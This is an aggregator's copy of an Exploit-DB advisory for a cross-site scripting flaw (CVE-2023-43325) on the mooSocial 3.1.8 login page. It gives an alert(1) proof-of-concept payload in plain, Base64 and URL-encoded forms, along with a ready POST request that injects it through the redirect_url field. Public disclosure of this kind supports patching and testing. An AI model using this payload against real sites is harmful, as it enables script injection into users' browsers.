4

[webapps] mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

 7 months ago
source link: https://www.exploit-db.com/exploits/51766
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

EDB-ID:

51766

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2024-02-02

Vulnerable App:

# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325


Description:

A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.

Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request 
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	test"><img src=a onerror=alert(1)>test 

	Payload (Base64 encoded) : 
	dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
	
	Final Payload (Base64+Url encoded): 
	dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

	POST Request on /moosocial/users/login (POST REQUEST DATA ONLY): 
	[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK